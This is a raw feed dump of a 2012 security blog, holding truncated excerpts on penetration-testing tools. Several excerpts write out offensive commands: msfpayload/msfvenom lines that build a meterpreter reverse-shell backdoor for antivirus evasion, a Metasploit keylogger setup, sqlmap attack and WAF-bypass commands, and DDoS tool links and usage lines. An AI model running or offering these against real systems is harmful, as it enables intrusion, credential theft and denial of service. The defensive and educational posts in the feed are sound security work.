tag:blogger.com,1999:blog-4148307234956956891Sat, 03 Mar 2012 23:48:31 +0000mobileobfuscation0dayMicrosoftdecodejavascripthtml5newsHydrasnifferingCainhackingInformation SecurityAppleWebdeobfuscateWeb Application AttackbacktrackSourceOWASPDefensiveNetwork Securitysecurity newsexploitationshellBrute ForceVulnerabilityscam app.videoWeb ApplicationxssdosiOSlinuxreverse_engineeringfacebookCrackbotsocial engineeringbackdoortoolhowtosecuritysql_injectionprogrammingAbelWiresharknmapmetasploittrojanfake antivirusfuzzNetwork Security ToolkitAPTw3afforensicshacking toolpacket analysisandroidInformation LeakwirelesstricktwittersnifferfixarticleNSTiPadBrute Force Toolpentestvideo securitypasswordPublic about IT. security news and technical.http://r00tsec.blogspot.com/noreply@blogger.com (Sumate jitpukdebodin)Blogger611125Subscribe with My Yahoo!Subscribe with NewsGatorSubscribe with My AOLSubscribe with BloglinesSubscribe with NetvibesSubscribe with GoogleSubscribe with PageflakesSubscribe with PlusmoSubscribe with The Free DictionarySubscribe with Bitty BrowserSubscribe with Live.comSubscribe with Excite MIXSubscribe with WebwagSubscribe with Podcast ReadySubscribe with WikioSubscribe with Daily Rotationtag:blogger.com,1999:blog-4148307234956956891.post-8359017934179962138Sat, 03 Mar 2012 23:45:00 +00002012-03-04T06:45:36.233+07:00Information Leaktoolhacking toolInformation SecurityarticlesecurityWeb Application Attackexploitationpentestsql_injectionSourcehackingtrickIf you want all the detail, please go to the Source. Example Command python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/http://feedproxy.google.com/~r/r00tsecblog/~3/dMpYk4PSCLE/automated-audit-using-sqlmap-by-owasp.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/nYop94odW-JPxUPiYh-fwRizA_g/0/da"><img src="http://feedads.g.doubleclick.net/~a/nYop94odW-JPxUPiYh-fwRizA_g/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/nYop94odW-JPxUPiYh-fwRizA_g/1/da"><img src="http://feedads.g.doubleclick.net/~a/nYop94odW-JPxUPiYh-fwRizA_g/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/dMpYk4PSCLE" height="1" width="1"/>http://r00tsec.blogspot.com/2012/03/automated-audit-using-sqlmap-by-owasp.htmltag:blogger.com,1999:blog-4148307234956956891.post-1031778548712554770Wed, 29 Feb 2012 02:54:00 +00002012-02-29T09:54:48.483+07:00forensicspentestlinuxSourcehowtoInformation SecuritysecurityandroidtrickIf you want to see all detail, please go to the Source. What is Password Lock? So, while the Pattern Lock is a number, Password Lock can contain characters, numbers, and special marks. Unlike patterns passwords can be a real problem for the attacker as the number of variants grows tremendously. Of course, this is true if you want to brute force Password lock just like the Pattern. Well, http://feedproxy.google.com/~r/r00tsecblog/~3/7HnWmXipz4M/android-forensics-study-of-password-and.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/ADl9QLUmy9fi6YQmpvbVeEF5fdI/0/da"><img src="http://feedads.g.doubleclick.net/~a/ADl9QLUmy9fi6YQmpvbVeEF5fdI/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/ADl9QLUmy9fi6YQmpvbVeEF5fdI/1/da"><img src="http://feedads.g.doubleclick.net/~a/ADl9QLUmy9fi6YQmpvbVeEF5fdI/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/7HnWmXipz4M" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/android-forensics-study-of-password-and.htmltag:blogger.com,1999:blog-4148307234956956891.post-4509996640753232285Mon, 27 Feb 2012 02:14:00 +00002012-02-27T09:14:07.736+07:00Brute Force TooltoolpentestexploitationSourcedosInformation Securityhacking toolsecurityarticlehackingtrick DDOS TOOLS LIST!   DDoSim (Linux) - Download => http://tinyurl.com/4xe3vjk Loris - Download => http://ha.ckers.org/slowloris/ Apachekiller - Download => http://pastebin.com/9y9Atijn save as "whatever.pl" <-- More Infohttp://thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html perl for windows => http://www.activestate.com/activeperl/downloads pyloris => http://http://feedproxy.google.com/~r/r00tsecblog/~3/QBCONE8bf-w/ddos-tool-list-from-anonymous.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/-FZ50pWeHsVVkPPrM1pd3C4bQjc/0/da"><img src="http://feedads.g.doubleclick.net/~a/-FZ50pWeHsVVkPPrM1pd3C4bQjc/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/-FZ50pWeHsVVkPPrM1pd3C4bQjc/1/da"><img src="http://feedads.g.doubleclick.net/~a/-FZ50pWeHsVVkPPrM1pd3C4bQjc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/QBCONE8bf-w" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/ddos-tool-list-from-anonymous.htmltag:blogger.com,1999:blog-4148307234956956891.post-7372073907322488676Wed, 22 Feb 2012 19:59:00 +00002012-02-23T02:59:28.350+07:00Information Leaktoolhowtoxsshacking toolInformation SecurityarticlesecuritymetasploitshellexploitationpentesthackingtrickIf you want the detail, please go to the Source. Step 1: Module setup: msf > use auxiliary/server/capture/http_javascript_keylogger msf  auxiliary(http_javascript_keylogger) > set demo true demo => true msf  auxiliary(http_javascript_keylogger) > show options Module options (auxiliary/server/capture/http_javascript_keylogger):    Name        Current Setting  Required  Description    ----http://feedproxy.google.com/~r/r00tsecblog/~3/1wfI3ACcvk8/keylogging-with-metasploit-javascript.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/9y4WhLLhtUF5FcVuZn8RUNq0nE4/0/da"><img src="http://feedads.g.doubleclick.net/~a/9y4WhLLhtUF5FcVuZn8RUNq0nE4/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/9y4WhLLhtUF5FcVuZn8RUNq0nE4/1/da"><img src="http://feedads.g.doubleclick.net/~a/9y4WhLLhtUF5FcVuZn8RUNq0nE4/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/1wfI3ACcvk8" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/keylogging-with-metasploit-javascript.htmltag:blogger.com,1999:blog-4148307234956956891.post-3472650812244106724Wed, 22 Feb 2012 06:49:00 +00002012-02-22T13:49:50.708+07:00DefensivetoolpentesthowtoInformation SecuritysecurityNetwork Securitytrick#!/bin/bash # To run this file, first give the permission +x and execute this program # --# chmod +x blocknmap.sh # --# ./blocknmap.sh echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1" echo "3 3" echo "3 ________ .__ ________ 3" echo "7 \______ \ http://feedproxy.google.com/~r/r00tsecblog/~3/lt4rk8IFq4o/iptables-shell-script-for-block-nmap.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/m9iOdN3YLDR74jsdeF-MV8MQY6c/0/da"><img src="http://feedads.g.doubleclick.net/~a/m9iOdN3YLDR74jsdeF-MV8MQY6c/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/m9iOdN3YLDR74jsdeF-MV8MQY6c/1/da"><img src="http://feedads.g.doubleclick.net/~a/m9iOdN3YLDR74jsdeF-MV8MQY6c/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/lt4rk8IFq4o" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/iptables-shell-script-for-block-nmap.htmltag:blogger.com,1999:blog-4148307234956956891.post-6184750032510855779Tue, 21 Feb 2012 04:28:00 +00002012-02-21T11:28:15.360+07:00toolhowtohacking toolInformation SecurityarticlesecuritymetasploitshellbacktrackbackdoorexploitationpentestSourcehackingtrickFirewall 1. Show Firewall Operation Mode > netsh firewall show opmode C:\Documents and Settings\Administrator>netsh firewall show opmodeDomain profile configuration:-------------------------------------------------------------------Operational mode                  = EnableException mode                    = EnableStandard profile configuration (current):----------------------------------------http://feedproxy.google.com/~r/r00tsecblog/~3/igomTYLUgqY/post-exploitation-to-manage-firewall.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/sqwDmObuUq6op1PBHFTo7nu5XGk/0/da"><img src="http://feedads.g.doubleclick.net/~a/sqwDmObuUq6op1PBHFTo7nu5XGk/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/sqwDmObuUq6op1PBHFTo7nu5XGk/1/da"><img src="http://feedads.g.doubleclick.net/~a/sqwDmObuUq6op1PBHFTo7nu5XGk/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/igomTYLUgqY" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/post-exploitation-to-manage-firewall.htmltag:blogger.com,1999:blog-4148307234956956891.post-3143323391189843488Tue, 21 Feb 2012 03:58:00 +00002012-02-21T10:58:47.276+07:00Information Leaktoolhacking toolInformation SecuritysecurityWeb Application AttackWebexploitationlinuxpentestsql_injectionSourceWeb ApplicationhackingtrickIf you want the detail and who develop this plugin, please go to the Source. 1.  Firstly, Download the plugin https://gason.googlecode.com/files/burpplugins.jar 2. Run the burpsuite with plugin $ java -classpath burpplugins.jar:”BurpSuite_v1.4.01.jar” burp.StartBurp 3. Click right mouse button over the url you want to test with sqlmap and choose "Send to  sqlmap"   4. Configure the sqlmap http://feedproxy.google.com/~r/r00tsecblog/~3/hIiVVEE46AU/sqlmap-plugin-for-burpsuite.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/p99yN0-hwhuF8CRXKQxuRMPVJog/0/da"><img src="http://feedads.g.doubleclick.net/~a/p99yN0-hwhuF8CRXKQxuRMPVJog/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/p99yN0-hwhuF8CRXKQxuRMPVJog/1/da"><img src="http://feedads.g.doubleclick.net/~a/p99yN0-hwhuF8CRXKQxuRMPVJog/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/hIiVVEE46AU" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/sqlmap-plugin-for-burpsuite.htmltag:blogger.com,1999:blog-4148307234956956891.post-8404796223399305926Sat, 18 Feb 2012 02:58:00 +00002012-02-18T09:58:18.330+07:00toolhowtohacking toolInformation SecurityarticlesecuritymetasploitMicrosoftshellexploitationpentestobfuscationhackingtrickIf you want all the detail, please go to the Source. 1. Create malicious file(backdoor) $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary or $ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary 2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder ofhttp://feedproxy.google.com/~r/r00tsecblog/~3/WCpM8UF9cJs/using-metasm-to-avoid-antivirus.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/EkeU9HuMRM1Iome8zVF5NaAHFm0/0/da"><img src="http://feedads.g.doubleclick.net/~a/EkeU9HuMRM1Iome8zVF5NaAHFm0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/EkeU9HuMRM1Iome8zVF5NaAHFm0/1/da"><img src="http://feedads.g.doubleclick.net/~a/EkeU9HuMRM1Iome8zVF5NaAHFm0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/WCpM8UF9cJs" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/using-metasm-to-avoid-antivirus.htmltag:blogger.com,1999:blog-4148307234956956891.post-6413802714765014017Fri, 17 Feb 2012 08:02:00 +00002012-02-17T17:35:34.742+07:00Information LeaktooliPadhacking toolInformation Securityarticlesecuritymetasploitexploitationpentestsql_injectionSourceiOShackingtrickAll the app that I recommended, you must jailbreak your device.  Repository: Default cydia repo http://cydia.myrepospace.com/chattaboxa http://cydia.myrepospace.com/boo http://cydia.theworm.tw/ OpenSSH – Allows to connect to the iPhone remotely over SSH Adv-cmds : Comes with a set of process commands like ps, kill, finger… Sqlite3 : Sqlite database client GNU Debugger: For run time analysis & http://feedproxy.google.com/~r/r00tsecblog/~3/zlIeaZ80Img/recommended-security-application-of-ios.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/xgjXusk2NDUfZ5dAaVrV0hFdZuY/0/da"><img src="http://feedads.g.doubleclick.net/~a/xgjXusk2NDUfZ5dAaVrV0hFdZuY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xgjXusk2NDUfZ5dAaVrV0hFdZuY/1/da"><img src="http://feedads.g.doubleclick.net/~a/xgjXusk2NDUfZ5dAaVrV0hFdZuY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/zlIeaZ80Img" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/recommended-security-application-of-ios.htmltag:blogger.com,1999:blog-4148307234956956891.post-8586330851001301763Fri, 17 Feb 2012 07:00:00 +00002012-02-17T14:00:55.634+07:00Information Leaktoolsql_injectionpentesthowtoInformation Securityhacking toolsecurityarticlehackingtrick The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ The first scripts I’ll demonstrate are http://feedproxy.google.com/~r/r00tsecblog/~3/_GUyoPBr9B8/bypassing-web-application-firewalls.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/6pzUTNo0AeWMwUex-_tjTqprmuY/0/da"><img src="http://feedads.g.doubleclick.net/~a/6pzUTNo0AeWMwUex-_tjTqprmuY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/6pzUTNo0AeWMwUex-_tjTqprmuY/1/da"><img src="http://feedads.g.doubleclick.net/~a/6pzUTNo0AeWMwUex-_tjTqprmuY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/_GUyoPBr9B8" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/bypassing-web-application-firewalls.htmltag:blogger.com,1999:blog-4148307234956956891.post-8746215247259899976Mon, 13 Feb 2012 13:40:00 +00002012-02-13T20:40:27.237+07:00WebtoolpentestexploitationInformation Securityhacking toolsecurityWeb ApplicationWeb Application AttackhackingtrickThis program makes proxy servers into DDoS clients. Use only for educational and research purposes.  ->Requires<- -> pycurl -> python 2.3                                      ->Usage<- $ ./barrelroll.py [ip] [host] [forks]                                     ->Example<- $ ./barrelroll.py 8.8.8.8 google.com 30 < full_list/_full_list.txt $ ./barrelroll.py 8.8.4.4 http://feedproxy.google.com/~r/r00tsecblog/~3/ythfIfVlew0/barrelroll-make-proxy-server-to-ddos.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/2LM13B-_EVK6em-2H-VSHlfiJXs/0/da"><img src="http://feedads.g.doubleclick.net/~a/2LM13B-_EVK6em-2H-VSHlfiJXs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/2LM13B-_EVK6em-2H-VSHlfiJXs/1/da"><img src="http://feedads.g.doubleclick.net/~a/2LM13B-_EVK6em-2H-VSHlfiJXs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/ythfIfVlew0" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/barrelroll-make-proxy-server-to-ddos.htmltag:blogger.com,1999:blog-4148307234956956891.post-545137475884125277Sun, 12 Feb 2012 01:42:00 +00002012-02-12T08:42:20.806+07:00toolexploitationSourcehowtoInformation Securityhacking toolsecurityarticlehackingtrickIf you want the detail and list of tools, please go to the source. 1. Download the script - svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit 2. Go into folder and change mode of script - cd bt5-fixit - chmod +x bt5-fixit.sh 3. Run it and check what you got. - ./bt5-fixit.sh Source: http://www.theprojectxblog.net/improving-and-adding-more-pentesting-tools-for-backtrack-5/ Ifhttp://feedproxy.google.com/~r/r00tsecblog/~3/300LtWE1VIw/adding-more-pentesting-tools-for.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/CZtjddi3giYKPSQHU-zzKlHTdfU/0/da"><img src="http://feedads.g.doubleclick.net/~a/CZtjddi3giYKPSQHU-zzKlHTdfU/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/CZtjddi3giYKPSQHU-zzKlHTdfU/1/da"><img src="http://feedads.g.doubleclick.net/~a/CZtjddi3giYKPSQHU-zzKlHTdfU/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/300LtWE1VIw" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/adding-more-pentesting-tools-for.htmltag:blogger.com,1999:blog-4148307234956956891.post-6486035351794722820Thu, 09 Feb 2012 11:55:00 +00002012-02-09T18:55:49.918+07:00WebInformation Leaksecurity newsnewsexploitationInformation SecuritysecurityarticleWeb ApplicationWeb Application AttackhackingtrickVulnerability in Novell website. From: Team <team () uniscan com br>Date: Wed, 08 Feb 2012 23:10:21 -0200  Hello :-) I sent email stating the problem for the company,waited a few days and got no response, so I'm making the vulnerabilitypublic: Scan date: 2-2-201213:33:54===================================================================================================|Domain: http://http://feedproxy.google.com/~r/r00tsecblog/~3/GH9yNplRLqU/vulnerability-in-novell-website-by-team.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/SqaTg7I3ay1qeold0sk352rZ4Uw/0/da"><img src="http://feedads.g.doubleclick.net/~a/SqaTg7I3ay1qeold0sk352rZ4Uw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/SqaTg7I3ay1qeold0sk352rZ4Uw/1/da"><img src="http://feedads.g.doubleclick.net/~a/SqaTg7I3ay1qeold0sk352rZ4Uw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/GH9yNplRLqU" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/vulnerability-in-novell-website-by-team.htmltag:blogger.com,1999:blog-4148307234956956891.post-2089919283023796942Wed, 08 Feb 2012 07:55:00 +00002012-02-08T14:55:26.961+07:00tooliPadexploitationInformation SecuritysecurityiOSApplehackingtrickCrackNow that iOS 5.0.1 is available for download, we knew it was only a matter of days before a Jailbreak would be available for the new iOS. And we didn’t have long to wait. A tethered jailbreak version of RedSn0w 0.9.9b8. Is now available for download. For those of you who wish to wait for an untethered jailbreak, keep in mind that the jailbreak may not be available in the near future. Keep http://feedproxy.google.com/~r/r00tsecblog/~3/E0aA24bzTiw/howto-jailbreak-iphone-ios-5.htmlnoreply@blogger.com (Sumate jitpukdebodin)1<p><a href="http://feedads.g.doubleclick.net/~a/PkAIBR_s9pfHrwnGxUfDt9zpvI0/0/da"><img src="http://feedads.g.doubleclick.net/~a/PkAIBR_s9pfHrwnGxUfDt9zpvI0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/PkAIBR_s9pfHrwnGxUfDt9zpvI0/1/da"><img src="http://feedads.g.doubleclick.net/~a/PkAIBR_s9pfHrwnGxUfDt9zpvI0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/E0aA24bzTiw" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/howto-jailbreak-iphone-ios-5.htmltag:blogger.com,1999:blog-4148307234956956891.post-5173630061077570319Wed, 08 Feb 2012 07:42:00 +00002012-02-08T14:42:05.909+07:00Information LeaktoolpentestexploitationSourcetrojanInformation Securitysecurityandroid0dayhackingAndroid Multiple Vulnerabilities Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2012/2/8 References: http://www.80vul.com/android/android-0days.txt Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/], there three papers on the android application security about the development environment,browser security, inter-application communication.And published http://feedproxy.google.com/~r/r00tsecblog/~3/J0zVX6NuTCA/android-multiple-vulnerabilities-by.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/Pvq5741hH-0jvyxpEn0ndjCJWTg/0/da"><img src="http://feedads.g.doubleclick.net/~a/Pvq5741hH-0jvyxpEn0ndjCJWTg/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Pvq5741hH-0jvyxpEn0ndjCJWTg/1/da"><img src="http://feedads.g.doubleclick.net/~a/Pvq5741hH-0jvyxpEn0ndjCJWTg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/J0zVX6NuTCA" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/android-multiple-vulnerabilities-by.htmltag:blogger.com,1999:blog-4148307234956956891.post-2845910381204043884Tue, 07 Feb 2012 07:49:00 +00002012-02-07T14:49:00.953+07:00toolhowtohacking toolInformation SecurityarticlesecuritymetasploitCrackexploitationpentestSourceiOShackingtrick #/bin/bash # Author: Khalil Ounis # Description: iDevice Metasploit Auto Installer Script Version 3 # Web Site: www.89geek.com ROOT_UID=0 VARDIR=/private/var/ CURRDIR=`pwd` E_NODIR=1 E_CANTRESOLVE=4 E_NOTROOT=67 E_CMDNOTFOUND=127 clear [ "$UID" != "$ROOT_UID" ] && { echo "This script must be run as root"; exit $E_NOTROOT; } echo "Metasploit Installer Script V3 - By Khalil Ounis" echo "http://feedproxy.google.com/~r/r00tsecblog/~3/R2topZQRvN0/installer-script-for-metasploit-on-ios5.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/eJFEIGk3bb1cKebhvKI0QZxtisc/0/da"><img src="http://feedads.g.doubleclick.net/~a/eJFEIGk3bb1cKebhvKI0QZxtisc/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/eJFEIGk3bb1cKebhvKI0QZxtisc/1/da"><img src="http://feedads.g.doubleclick.net/~a/eJFEIGk3bb1cKebhvKI0QZxtisc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/R2topZQRvN0" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/installer-script-for-metasploit-on-ios5.htmltag:blogger.com,1999:blog-4148307234956956891.post-1668516400696581682Sun, 05 Feb 2012 00:51:00 +00002012-02-05T07:51:45.102+07:00Information LeaktoolexploitationSourceInformation SecuritysecurityandroidhackingCrack If you want to see full list of android malware, please go to the source. This database is open source and anybody can send comments in order to add new links to analysis articles, to apply modifications on signatures or to add new signatures (it's is done on our free time, of course our free time is limited, so if you want to help, you are welcome !). email: androguard (at) t0t0 (dot) http://feedproxy.google.com/~r/r00tsecblog/~3/0EH8-Lx3QZA/open-source-database-of-android-malware.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/qWsMgQDEt2AvsJd9QL_p8KyWhLY/0/da"><img src="http://feedads.g.doubleclick.net/~a/qWsMgQDEt2AvsJd9QL_p8KyWhLY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/qWsMgQDEt2AvsJd9QL_p8KyWhLY/1/da"><img src="http://feedads.g.doubleclick.net/~a/qWsMgQDEt2AvsJd9QL_p8KyWhLY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/0EH8-Lx3QZA" height="1" width="1"/>http://r00tsec.blogspot.com/2012/02/open-source-database-of-android-malware.htmltag:blogger.com,1999:blog-4148307234956956891.post-7514256566590991730Tue, 31 Jan 2012 07:00:00 +00002012-01-31T14:02:23.092+07:00Information Leakhacking toolInformation SecurityarticlesecuritymetasploitwirelesslinuxpentestsnifferNetwork Securitypacket analysishacking I found myself inspired by Vivek Ramachandran’s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos. When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might http://feedproxy.google.com/~r/r00tsecblog/~3/04_qU6-mqKY/easy-wireless-honey-pots-using-win7-and.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/VEeOfHTrYRHXtWl9KS1tTPTsnOw/0/da"><img src="http://feedads.g.doubleclick.net/~a/VEeOfHTrYRHXtWl9KS1tTPTsnOw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/VEeOfHTrYRHXtWl9KS1tTPTsnOw/1/da"><img src="http://feedads.g.doubleclick.net/~a/VEeOfHTrYRHXtWl9KS1tTPTsnOw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/04_qU6-mqKY" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/easy-wireless-honey-pots-using-win7-and.htmltag:blogger.com,1999:blog-4148307234956956891.post-6001682864204269970Mon, 30 Jan 2012 08:11:00 +00002012-01-30T17:34:38.289+07:00toolpentestlinuxexploitationInformation Securityhacking toolsecuritywirelessNetwork SecurityandroidhackingtrickNetwork Spoofer lets you mess with the internet on other people's computers. Network Spoofer lets you mess with websites on other people's computers - flip pictures, change Google searches, redirect websites and many more features to come. DISCLAIMER: The developer(s) of this application are not in any way responsible for it's use or misuse; only use it for demonstration purposes on networkshttp://feedproxy.google.com/~r/r00tsecblog/~3/ABskTuPYyVw/network-spoofer.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/NdtztG_8CsocRIxTs3ZYSXJX6ks/0/da"><img src="http://feedads.g.doubleclick.net/~a/NdtztG_8CsocRIxTs3ZYSXJX6ks/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/NdtztG_8CsocRIxTs3ZYSXJX6ks/1/da"><img src="http://feedads.g.doubleclick.net/~a/NdtztG_8CsocRIxTs3ZYSXJX6ks/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/ABskTuPYyVw" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/network-spoofer.htmltag:blogger.com,1999:blog-4148307234956956891.post-80569018450373225Sat, 28 Jan 2012 11:13:00 +00002012-02-01T16:10:42.335+07:00DefensiveInformation Leaksecurity newspentestVulnerabilityInformation SecuritysecurityarticleWeb ApplicationWeb Application Attackhacking วิเคราะห์การโจมตีและผลกระทบต่อการโดนโจมตีของเว็บไซด์ Me by TMB บทนำ           ช่วงเช้าของวันที่ 28 มกราคม 2555 ก็เป็นอีกวันหนึ่งที่ผมนั่งอ่านข่าวเรื่อง Computer Security ไปเรื่อยๆตามปกติ แต่มีข่าวหนึ่งที่ทำให้ผมถึงกับสะดุ้งและสนใจในการค้นหาข้อมูลต่อตอนประมาณ 11:30  ก็คือกรณีการโดนเปลี่ยนหน้าเว็บเพจธนาคารรูปแบบใหม่จากธนาคารทหารไทย(TMB)ซึ่งใช้ชื่อว่า Me By TMB และใช้สโลแกนว่า "กล้าไหม? http://feedproxy.google.com/~r/r00tsecblog/~3/C14mWh17Jas/me-by-tmb.htmlnoreply@blogger.com (Sumate jitpukdebodin)1<p><a href="http://feedads.g.doubleclick.net/~a/IBy50e4DoYI7nQHk-DAEseXPkSY/0/da"><img src="http://feedads.g.doubleclick.net/~a/IBy50e4DoYI7nQHk-DAEseXPkSY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/IBy50e4DoYI7nQHk-DAEseXPkSY/1/da"><img src="http://feedads.g.doubleclick.net/~a/IBy50e4DoYI7nQHk-DAEseXPkSY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/C14mWh17Jas" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/me-by-tmb.htmltag:blogger.com,1999:blog-4148307234956956891.post-5418160438150736646Sat, 28 Jan 2012 05:08:00 +00002012-01-28T12:08:44.859+07:00toolpentesthowtoInformation Securityhacking toolsecurityarticlepacket analysishackingtrick If you want to see full detail of IP Spoofing, please go to the Source. Services vulnerable to IP spoofing Configurations and services that are vulnerable to IP spoofing: RPC (Remote Procedure Call services) Any service that uses IP address authentication The X Window System The R services suite Most popular tools used to modify packet headers: Tools – For Windows Engage Packet http://feedproxy.google.com/~r/r00tsecblog/~3/Zo-LkqrWeK0/ip-spoofing-attack-tool-list.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a 